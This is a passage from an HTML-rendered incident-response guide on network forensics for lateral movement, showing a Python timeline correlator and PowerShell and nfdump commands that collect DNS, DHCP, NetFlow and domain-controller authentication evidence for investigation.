32%)\">'timestamp'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">] </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  MOVEMENT: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'src_hostname'</span><span class=\"token 
string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> (</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'src_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">)\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"       --&gt; </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'dst_hostname'</span><span class=\"token string-interpolation interpolation 
punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> (</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'dst_ip'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">) via </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">port_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  IDENTITY: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span 
class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'auth_account'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> [</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'auth_type'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">, Type </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">event</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'logon_type'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span 
class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  VOLUME:   </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">mb</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\"> MB transferred\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"  FLAGS:    </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation\">flags_str</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Usage during incident response:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> __name__ </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'__main__'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> NetworkForensicsCorrelator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_dhcp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dhcp_export.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span 
class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_netflow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'netflow_internal.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">load_auth_logs</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'dc_auth_events.csv'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    timeline </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">correlate</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">time_window_seconds</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">60</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">print_timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> high_only</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Export full timeline for SIEM ingestion or report</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">open</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lateral_movement_timeline.json'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'w'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> 
f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">dump</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">timeline</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> f</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> indent</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">2</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> default</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">str</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"\\n[*] Full timeline exported to lateral_movement_timeline.json\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    
</span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] Total events: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">len</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation\">timeline</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">f\"[*] HIGH severity: </span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token string-interpolation interpolation builtin\" style=\"color:hsl(212, 92%, 35%)\">sum</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string-interpolation interpolation number\" style=\"color:hsl(212, 92%, 35%)\">1</span><span class=\"token string-interpolation interpolation\"> 
</span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">for</span><span class=\"token string-interpolation interpolation\"> e </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token string-interpolation interpolation\"> timeline </span><span class=\"token string-interpolation interpolation keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token string-interpolation interpolation\"> e</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'severity'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token string-interpolation interpolation\"> </span><span class=\"token string-interpolation interpolation string\" style=\"color:hsl(139, 66%, 32%)\">'HIGH'</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token string-interpolation interpolation punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token string-interpolation string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-7--the-investigation-workflow-a-decision-tree-for-ir-teams\">Part 7  The Investigation Workflow: A Decision Tree for IR Teams<a 
href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-7--the-investigation-workflow-a-decision-tree-for-ir-teams\" class=\"hash-link\" aria-label=\"Direct link to Part 7  The Investigation Workflow: A Decision Tree for IR Teams\" title=\"Direct link to Part 7  The Investigation Workflow: A Decision Tree for IR Teams\" translate=\"no\">​</a></h2>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"71-quick-reference-ir-commands-by-phase\">7.1 Quick Reference: IR Commands by Phase<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#71-quick-reference-ir-commands-by-phase\" class=\"hash-link\" aria-label=\"Direct link to 7.1 Quick Reference: IR Commands by Phase\" title=\"Direct link to 7.1 Quick Reference: IR Commands by Phase\" translate=\"no\">​</a></h3>\n<p><strong>Phase 1  Evidence Collection (first 30 minutes)</strong></p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On suspected source host  collect before reboot or shutdown</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ipconfig /displaydns &gt; dns_cache_$(hostname).txt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DnsClientCache | Export-Csv dns_cache_structured_$(hostname).csv -NoTypeInformation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" 
style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On DHCP server  export current leases and logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Copy-Item \"C:\\Windows\\System32\\dhcp\\DhcpSrvLog-*.log\" \"C:\\IR\\dhcp_logs\\\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-DhcpServerv4Lease -ScopeId 10.10.0.0 -AllLeases |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object IPAddress, ClientId, HostName, AddressState, LeaseExpiryTime |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Export-Csv \"C:\\IR\\dhcp_active_leases.csv\" -NoTypeInformation</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># On Domain Controllers  export auth events for investigation window</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$filter = @{LogName='Security'; Id=@(4624,4625,4648,4769,4776,4768,4771,4672);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            StartTime=(Get-Date).AddDays(-7); EndTime=(Get-Date)}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-WinEvent -FilterHashtable $filter |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ForEach-Object { $_.ToXml() } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Out-File 
\"C:\\IR\\dc_auth_events_raw.xml\"</span><br></span></code></pre></div></div>\n<p><strong>Phase 2  NetFlow Queries (first 2 hours)</strong></p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># On NetFlow collector  identify all east-west connections from suspected host</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Replace 10.10.5.42 with your compromised host IP</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">SUSPECT</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"10.10.5.42\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">START</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-14 00:00:00\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token 
assign-left variable\" style=\"color:hsl(26, 100%, 29%)\">END</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 23:59:59\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/ </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-t</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${START}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">-</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${END}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts,%te,%sa,%da,%dp,%pr,%byt,%pkt,%flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">\"src ip </span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">${SUSPECT}</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\"> and dst net 10.0.0.0/8\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> suspected_host_flows.csv</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find all unique internal destinations</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> -F</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">','</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'NR&gt;1 {print $4}'</span><span class=\"token plain\"> suspected_host_flows.csv </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-u</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&gt;</span><span class=\"token plain\"> unique_destinations.txt</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token builtin class-name\" style=\"color:hsl(26, 100%, 29%)\">echo</span><span class=\"token plain\"> </span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Unique internal targets: </span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$(</span><span class=\"token string variable function\" style=\"color:hsl(256, 54%, 50%)\">wc</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> </span><span class=\"token string variable parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-l</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> </span><span class=\"token string variable operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\"> unique_destinations.txt</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">)</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"</span><br></span></code></pre></div></div>\n<p><strong>Phase 3  Correlation and Timeline (hours 2-4)</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 